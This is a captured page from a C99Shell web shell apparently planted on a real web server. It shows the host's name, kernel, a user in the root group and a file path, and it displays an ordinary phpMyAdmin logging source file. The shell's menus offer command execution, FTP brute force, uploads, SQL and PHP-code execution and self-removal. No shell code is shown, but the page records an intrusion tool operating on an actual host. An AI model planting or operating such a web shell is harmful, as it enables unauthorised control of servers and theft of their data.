!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/libraries/classes/   drwxr-xr-x
Free 28.79 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Logging.php (2.69 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Logging functionality for webserver.
 *
 * This includes web server specific code to log some information.
 */

declare(strict_types=1);

namespace 
PhpMyAdmin;

use function 
closelog;
use function 
date;
use function 
error_log;
use function 
function_exists;
use function 
openlog;
use function 
syslog;

use const 
LOG_AUTHPRIV;
use const 
LOG_NDELAY;
use const 
LOG_PID;
use const 
LOG_WARNING;

/**
 * Misc logging functions
 */
class Logging
{
    
/**
     * Get authentication logging destination
     *
     * @return string
     */
    
public static function getLogDestination()
    {
        
$log_file $GLOBALS['config']->get('AuthLog');

        
/* Autodetect */
        
if ($log_file === 'auto') {
            if (
function_exists('syslog')) {
                
$log_file 'syslog';
            } elseif (
function_exists('error_log')) {
                
$log_file 'php';
            } else {
                
$log_file '';
            }
        }

        return 
$log_file;
    }

    
/**
     * Generate log message for authentication logging
     *
     * @param string $user   user name
     * @param string $status status message
     *
     * @return string
     */
    
public static function getLogMessage($user$status)
    {
        if (
$status === 'ok') {
            return 
'user authenticated: ' $user ' from ' Core::getIp();
        }

        return 
'user denied: ' $user ' (' $status ') from ' Core::getIp();
    }

    
/**
     * Logs user information to webserver logs.
     *
     * @param string $user   user name
     * @param string $status status message
     */
    
public static function logUser($user$status 'ok'): void
    
{
        if (
function_exists('apache_note')) {
            
apache_note('userID'$user);
            
apache_note('userStatus'$status);
        }

        
/* Do not log successful authentications */
        
if (! $GLOBALS['config']->get('AuthLogSuccess') && $status === 'ok') {
            return;
        }

        
$log_file self::getLogDestination();
        if (empty(
$log_file)) {
            return;
        }

        
$message self::getLogMessage($user$status);
        if (
$log_file === 'syslog') {
            if (
function_exists('syslog')) {
                @
openlog('phpMyAdmin'LOG_NDELAY LOG_PIDLOG_AUTHPRIV);
                @
syslog(LOG_WARNING$message);
                
closelog();
            }
        } elseif (
$log_file === 'php') {
            @
error_log($message);
        } elseif (
$log_file === 'sapi') {
            @
error_log($message4);
        } else {
            @
error_log(
                
date('M d H:i:s') . ' phpmyadmin: ' $message "\n",
                
3,
                
$log_file
            
);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--